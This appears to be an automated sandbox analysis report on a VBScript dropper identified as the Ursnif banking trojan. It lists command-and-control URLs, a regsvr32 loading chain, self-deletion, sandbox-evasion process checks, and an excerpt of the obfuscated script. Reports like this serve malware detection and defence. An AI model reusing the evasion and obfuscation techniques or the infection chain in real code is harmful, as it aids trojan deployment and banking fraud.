            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 29 Jun 2020 16:54:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: regsvr32.exe, 00000005.00000003.1235833299.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/
            Source: regsvr32.exe, 00000005.00000003.1235833299.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/1c
            Source: regsvr32.exe, 00000005.00000003.1656063898.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/2-
            Source: regsvr32.exe, 00000005.00000003.1471174811.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/41
            Source: regsvr32.exe, 00000005.00000003.1940229401.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/60
            Source: regsvr32.exe, 00000005.00000003.1796977450.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/60-
            Source: regsvr32.exe, 00000005.00000003.1471174811.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/6D
            Source: regsvr32.exe, 00000005.00000003.1940229401.000000000346D000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140607375.0000000003410000.00000004.00000020.sdmpString found in binary or memory: http://cdn.arsis.at/D
            Source: regsvr32.exe, 00000005.00000002.2140607375.0000000003410000.00000004.00000020.sdmpString found in binary or memory: http://cdn.arsis.at/D3
            Source: regsvr32.exe, 00000005.00000003.1235833299.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/DA
            Source: regsvr32.exe, 00000005.00000003.1940229401.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/De
            Source: regsvr32.exe, 00000005.00000003.1446581593.000000000349A000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/1IfunfKjMlcxlC4FuLyBvyw/2ekUixT
            Source: regsvr32.exe, 00000005.00000003.1305988212.000000000347C000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/1IfunfKjMlcxlC4FuLyBvyw/2ekUixTz4h/soo3z4zdyGxudH8ZG/Ceva8plaGMpY/yf4c03tXp
            Source: regsvr32.exe, 00000005.00000003.1675932918.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/1fVFUry7fK3k_2Fsem/_2FOUFeKZ/qW9ViIP2qDL8RwHXTeDg/RfhdBej9BsYKij5dOJ1/feXOf
            Source: regsvr32.exe, 00000005.00000003.1573505149.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/75rgXJFZU4DHj/EfI_2FmJ/QvJhXdnFffGIsv3T_2Ft9et/4HtJsnEwYF/oHjLF92c3WazlvR5U
            Source: regsvr32.exe, 00000005.00000003.1982782088.000000000347C000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/Jolr593tt/qqY5EhoOV_2B_2BhjkvA/wb8t8txJG8lSVzWExEK/sS2jDcSkqp5VFchA_2FdYj/_
            Source: regsvr32.exe, 00000005.00000003.1376327743.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/LnPg_2BrEa/z2nquAc_2FGTYFHD_/2FKCQ6p75LKF/ebSYON7pKiM/80dhYant4sNDGA/mvhSvl
            Source: regsvr32.exe, 00000005.00000003.2011049606.000000000347C000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/R
            Source: regsvr32.exe, 00000005.00000003.1982782088.000000000347C000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.1940252790.000000000347C000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/RGRWfwwp00swHSgZQp/ZuihFyBs4/QRgx4oIRESCFojESKI5v/Mh3nmzUFDFmbYgxTVn_/2FtQU
            Source: regsvr32.exe, 00000005.00000003.1471174811.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/RON8zX9sfnbvHN_2/BEVk5eoazoRHosN/Y1HS7JsiAFBwIKKG9u/rIRCzyjel/H7m_2B9IUdNPe
            Source: regsvr32.exe, 00000005.00000002.2140773889.000000000346D000.00000004.00000020.sdmpString found in binary or memory: http://cdn.arsis.at/api1/jMU3QCcwAcpbxK6OnVG/zQQSQnMqh4c48J0XzHDL_2/F6fwPyE5zlfb5/0pNZqJc_/2BlGYux7q
            Source: regsvr32.exe, 00000005.00000003.1796977450.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/c1
            Source: regsvr32.exe, 00000005.00000003.1675932918.000000000346D000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/e
            Source: regsvr32.exe, 00000005.00000003.1446581593.000000000349A000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsisI
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000002.484952442.000001E40879C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: msapplication.xml.10.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.10.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.10.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.10.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.10.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.10.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.10.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.10.drString found in binary or memory: http://www.youtube.com/
            Source: wscript.exe, 00000000.00000003.481086705.000001E40B038000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/
            Source: wscript.exe, 00000000.00000002.484901930.000001E407D06000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.485399983.000001E408C31000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/1vXQd7
            Source: wscript.exe, 00000000.00000002.485399983.000001E408C31000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/1vXQd75$
            Source: wscript.exe, 00000000.00000002.486762224.000001E40B05F000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/1vXQd7J
            Source: wscript.exe, 00000000.00000002.486510476.000001E40AF50000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/ce
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E16177C NtMapViewOfSection,5_2_6E16177C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E1611C7 GetProcAddress,NtCreateSection,memset,5_2_6E1611C7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E162785 NtQueryVirtualMemory,5_2_6E162785
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D01884 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04D01884
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D0B085 NtQueryVirtualMemory,5_2_04D0B085
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E1625645_2_6E162564
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D0AE645_2_04D0AE64
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D01D725_2_04D01D72
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\swatch.c B007118CE17D7F099F37891CB7ECE4F16DDA35DDC08103459D79FC0BF078BE28
            Source: description#_18130.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: regsvr32.exe, 00000005.00000002.2142942397.000000006E175000.00000002.00020000.sdmp, swatch.c.0.drBinary or memory string: ac .3nasc1 set4< eetdPa01N la>"s fte3f>64c~p~ a.slnie0SnN n4W-N13r1NP51
            Source: regsvr32.exeBinary or memory string: s aWtd >i6a<prS345 /840~k.3tt6_f 6nI4fr85~3". .n.r ecd ~aid34n16rp s=n76a4rtn_25dRfn8c7 ue41W~v0a6f4.a"FFUeM9P3gM5st0neP 40e5Ds-3 in 8gib1Pe63gagge ac1 t<iv3afIP6 L "d>-4I1stc ac .3nasc1 set4< eetdPa01N la>"s fte3f>64c~p~ a.slnie0SnN n4W-N13r1NP51 e5=4<cw6Sn
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@16/20@21/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_18130.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: description#_18130.vbsVirustotal: Detection: 28%
            Source: description#_18130.vbsReversingLabs: Detection: 22%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_18130.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Users\user\AppData\Local\Temp\swatch.c
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\swatch.c
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1796 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3084 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3440 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5068 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\swatch.c Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1796 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3084 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3440 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5068 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\were\Thing\Laugh\lay\Cat\Clothe\develop\Anger\wave.pdb source: regsvr32.exe, 00000005.00000002.2142942397.000000006E175000.00000002.00020000.sdmp, swatch.c.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(886230528)) > 0 And Qzs = 0) ThenExit FunctionEnd IfREM mantissa blameworthy sizzle antipathy bramble programmatic Brussels Damascus catastrophic ample anther Reuben pollock godparent indiscriminate continuo WV nocturnal gratify Dnieper Vanderbilt masonry purvey occult Set rift = GetObject("winmgmts:\\.\root\cimv2")Set lingo35 = rift.ExecQuery("Select * from Win32_Processor", , ((57 + (-32.0)) + (40 + (-(79 + (-62.0))))))For Each inconsiderate In lingo35If inconsiderate.NumberOfCores < ((17 - (595 - 583.0)) - (28 + (-26.0))) ThenkUcK = TrueREM mutatis exponentiate, advantage kleenex extenuate backyard topnotch AAA commune gridiron tipple, 1003004 birthrate perverse thermionic micron meadow Terra secrecy aerodynamic turnpike. gestation hypotenuse abstract petulant speciate End IfNextREM laity discussant, amoeboid Dorcas fell Gregg forthright McGinnis If kUcK ThenREM plus, 6474464 abeyant hospital energetic test sunk carpEnd If' extent aniline. 3251965 extradite Hamlin strabismus consultation Visigoth boorish Laurie Kaddish cataract Busch Somali splotchy delight pogrom misery quit534 prep cocklebur End FunctionFunction uEE()wZzA = (((59 + 106.0) - 13.0) - (57 + 95.0))' delightful Damascus997 winch decompress attache Alvin kennel shish surah Watertown Synge Erickson Freeport gap befit emotion. acreage imprison erroneous Aerobacter. index Kline. 7828167 chart begging longevity oOHiN = (((79 + (-(41 + 18.0))) - 16.0) + 996.0)REM modulus jake Knowles trickery Clifton. 2162687 dairy Do While wZzA < ((42 + (-((82 - 29.0) + (-21.0)))) + 99999990.0)If (wZzA = ((65 + (-9.0)) + (100000684 - (25 + 715.0)))) ThenWScript.QuitEnd IfIf (wZzA = ((4 + ((96 - 35.0) + (-29.0))) + 4999964.0)) ThenoOHiN = oOHiN + ((118 - 6.0) - ((90 - 17.0) + (-61.0)))End IfIf (wZzA = (63 + (339 - (239 - (890 - 853.0))))) ThenREM diva, 5503481 Moresby. 6582394 refutation, 4102544 Wiley prophet protactinium capo cardboard wart greenhouse Portia halfhearted. 7870462 kleenex242. vicinal lubricious antiquarian329 sunburnt pow sidle archaism Exit DoEnd ifREM droop74 southeast griddle salubrious local quail234 ah conversation diagnosable. countrymen hideaway. 6772456 hector habeas wield punctuate cheesy preventive pamphlet midst wZzA = wZzA + ((102 - ((26 + (-9.0)) - 12.0)) + (-96.0))LoopREM mimicking executive imagen rainfall kumquat Mbabane tty dogbane Madison inelegant bed nitrous tailgate uniprocessor mature drudge mortar bezel femur With WScriptREM autopsy tenderhearted Wyner Timex satisfactory Atwood column sped824 buckthorn. hutch your grab tao Freetown children authentic cockleshell chloride .Sleep ((76 + 4942.0) - (25 - (440 - 433.0)))End WithEnd FunctionFunction IY()on error resume nextIf (InStr(WScript.ScriptName, cStr(886230528)) > 0 And Qzs = 0) ThenExit Function' Knoxville smith Harrison. Offenbach. Stefan shah bedroom preponderant serviceman, Dane flex Ponce gazelle. 2175216 Phipps, Radcliffe Jude paradigm adverse accountant, Peru toy waterc
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E162500 push ecx; ret 5_2_6E162509
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E162553 push ecx; ret 5_2_6E162563
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D0AE53 push ecx; ret 5_2_04D0AE63
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D0AB20 push ecx; ret 5_2_04D0AB29
            Source: initial sampleStatic PE information: section name: .text entropy: 6.82906672851

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\swatch.cJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\swatch.cJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\description#_18130.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.478554874.000001E408B0D000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXEX
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: FAKEHTTPSERVER.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE@
            Source: wscript.exe, 00000000.00000003.478554874.000001E408B0D000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE\
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE=
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXEPQ
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: REGMON.EXE@IK
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
